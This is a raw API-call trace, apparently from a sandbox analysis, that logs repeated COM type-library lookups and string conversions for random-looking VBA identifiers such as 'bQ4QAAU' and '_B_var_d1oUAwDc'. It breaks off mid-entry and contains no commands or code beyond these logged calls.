[0069.803] ITypeComp:RemoteBind (in: This=0x665ba60, szName="bQ4QAAU", lHashVal=0x102844, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b820ae, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="bQ4QAAU") returned 8 [0069.803] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="bQ4QAAU", lHashVal=0x102844, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b820ae, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="bQ4QAAU") returned 8 [0069.803] ITypeComp:RemoteBind (in: This=0x665bd30, szName="bQ4QAAU", lHashVal=0x102844, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.803] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bQ4QAAU") returned 0x102844 [0069.803] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="bQ4QAAU" | out: _Dst="bQ4QAAU") returned 0x0 [0069.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="bQ4QAAU") returned 8 [0069.803] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.803] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="bQ4QAAU", lHashVal=0x102844, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.803] IUnknown:Release (This=0x665ba50) returned 0xd [0069.803] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.803] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="bQ4QAAU", lHashVal=0x102844, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.803] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.803] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.803] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="bQ4QAAU", lHashVal=0x102844, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.803] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.803] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.803] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="bQ4QAAU", lHashVal=0x102844, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.803] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b820ae, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="bQ4QAAU") returned 8 [0069.803] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="bQ4QAAU", lHashVal=0x102844, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.804] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.804] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b820ae | out: _Dst=0x67c2d40) returned 0x0 [0069.804] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_bQ4QAAU") returned 0x102bc8 [0069.804] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_bQ4QAAU" | out: _Dst="_B_var_bQ4QAAU") returned 0x0 [0069.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_bQ4QAAU") returned 15 [0069.804] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.804] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_bQ4QAAU", lHashVal=0x102bc8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.804] IUnknown:Release (This=0x665ba50) returned 0xd [0069.804] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.804] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_bQ4QAAU", lHashVal=0x102bc8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.804] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.804] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.804] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_bQ4QAAU", lHashVal=0x102bc8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.804] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.804] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.804] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_bQ4QAAU", lHashVal=0x102bc8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.804] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.804] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.804] IUnknown:Release (This=0x665ba50) returned 0xd [0069.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87151e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_bQ4QAAU") returned 15 [0069.804] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_bQ4QAAU", lHashVal=0x102bc8, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x62005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x62005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0) returned 0x0 [0069.804] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b820ae | out: _Dst=0x144ec0) returned 0x0 [0069.804] ITypeComp:RemoteBind (in: This=0x665ba60, szName="d1oUAwDc", lHashVal=0x10aec1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82126, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="d1oUAwDc") returned 9 [0069.805] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="d1oUAwDc", lHashVal=0x10aec1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82126, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="d1oUAwDc") returned 9 [0069.805] ITypeComp:RemoteBind (in: This=0x665bd30, szName="d1oUAwDc", lHashVal=0x10aec1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.805] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="d1oUAwDc") returned 0x10aec1 [0069.805] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="d1oUAwDc" | out: _Dst="d1oUAwDc") returned 0x0 [0069.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="d1oUAwDc") returned 9 [0069.805] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.805] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="d1oUAwDc", lHashVal=0x10aec1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.805] IUnknown:Release (This=0x665ba50) returned 0xd [0069.805] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.805] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="d1oUAwDc", lHashVal=0x10aec1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.805] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.805] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.805] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="d1oUAwDc", lHashVal=0x10aec1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.805] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.805] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.805] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="d1oUAwDc", lHashVal=0x10aec1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.805] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82126, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="d1oUAwDc") returned 9 [0069.805] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="d1oUAwDc", lHashVal=0x10aec1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.805] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.805] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b82126 | out: _Dst=0x67c2d40) returned 0x0 [0069.805] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_d1oUAwDc") returned 0x10864a [0069.805] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_d1oUAwDc" | out: _Dst="_B_var_d1oUAwDc") returned 0x0 [0069.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_d1oUAwDc") returned 16 [0069.806] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.806] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_d1oUAwDc", lHashVal=0x10864a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.806] IUnknown:Release (This=0x665ba50) returned 0xd [0069.806] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.806] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_d1oUAwDc", lHashVal=0x10864a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.806] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.806] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.806] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_d1oUAwDc", lHashVal=0x10864a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.806] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.806] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.806] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_d1oUAwDc", lHashVal=0x10864a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.806] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.806] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.806] IUnknown:Release (This=0x665ba50) returned 0xd [0069.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87154e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_d1oUAwDc") returned 16 [0069.806] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_d1oUAwDc", lHashVal=0x10864a, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x64005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x64005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0) returned 0x0 [0069.806] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82126 | out: _Dst=0x144ec0) returned 0x0 [0069.806] ITypeComp:RemoteBind (in: This=0x665ba60, szName="nGBGAAA", lHashVal=0x1074ef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82152, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="nGBGAAA") returned 8 [0069.806] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="nGBGAAA", lHashVal=0x1074ef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82152, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="nGBGAAA") returned 8 [0069.806] ITypeComp:RemoteBind (in: This=0x665bd30, szName="nGBGAAA", lHashVal=0x1074ef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.807] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nGBGAAA") returned 0x1074ef [0069.807] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ByRef", cchCount1=-1, lpString2="nGBGAAA", cchCount2=-1) returned 1 [0069.807] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="nGBGAAA" | out: _Dst="nGBGAAA") returned 0x0 [0069.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="nGBGAAA") returned 8 [0069.807] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.807] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="nGBGAAA", lHashVal=0x1074ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.807] IUnknown:Release (This=0x665ba50) returned 0xd [0069.807] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.807] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="nGBGAAA", lHashVal=0x1074ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.807] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.807] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.807] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="nGBGAAA", lHashVal=0x1074ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.807] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.807] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.807] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="nGBGAAA", lHashVal=0x1074ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.807] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82152, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="nGBGAAA") returned 8 [0069.807] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="nGBGAAA", lHashVal=0x1074ef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.807] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.807] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b82152 | out: _Dst=0x67c2d40) returned 0x0 [0069.807] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_nGBGAAA") returned 0x107873 [0069.807] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_nGBGAAA" | out: _Dst="_B_var_nGBGAAA") returned 0x0 [0069.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_nGBGAAA") returned 15 [0069.807] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.807] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_nGBGAAA", lHashVal=0x107873, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.807] IUnknown:Release (This=0x665ba50) returned 0xd [0069.807] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.807] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_nGBGAAA", lHashVal=0x107873, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.808] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.808] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.808] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_nGBGAAA", lHashVal=0x107873, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.808] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.808] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.808] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_nGBGAAA", lHashVal=0x107873, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.808] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.808] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.808] IUnknown:Release (This=0x665ba50) returned 0xd [0069.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87157e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_nGBGAAA") returned 15 [0069.808] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_nGBGAAA", lHashVal=0x107873, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0) returned 0x0 [0069.808] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b82152 | out: _Dst=0x144ec0) returned 0x0 [0069.808] ITypeComp:RemoteBind (in: This=0x665ba60, szName="Y1kUXA", lHashVal=0x102483, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8217a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="Y1kUXA") returned 7 [0069.808] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="Y1kUXA", lHashVal=0x102483, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8217a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="Y1kUXA") returned 7 [0069.808] ITypeComp:RemoteBind (in: This=0x665bd30, szName="Y1kUXA", lHashVal=0x102483, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.808] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Y1kUXA") returned 0x102483 [0069.808] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="Y1kUXA" | out: _Dst="Y1kUXA") returned 0x0 [0069.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="Y1kUXA") returned 7 [0069.808] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.808] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="Y1kUXA", lHashVal=0x102483, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.808] IUnknown:Release (This=0x665ba50) returned 0xd [0069.809] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.809] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="Y1kUXA", lHashVal=0x102483, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.809] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.809] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.809] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="Y1kUXA", lHashVal=0x102483, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.809] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.809] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.809] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="Y1kUXA", lHashVal=0x102483, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.809] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8217a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="Y1kUXA") returned 7 [0069.809] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="Y1kUXA", lHashVal=0x102483, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.809] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.809] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b8217a | out: _Dst=0x67c2d40) returned 0x0 [0069.809] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Y1kUXA") returned 0x109f2c [0069.809] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_Y1kUXA" | out: _Dst="_B_var_Y1kUXA") returned 0x0 [0069.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_Y1kUXA") returned 14 [0069.809] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.809] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_Y1kUXA", lHashVal=0x109f2c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.809] IUnknown:Release (This=0x665ba50) returned 0xd [0069.809] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.809] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_Y1kUXA", lHashVal=0x109f2c, pfName=0x144d70, 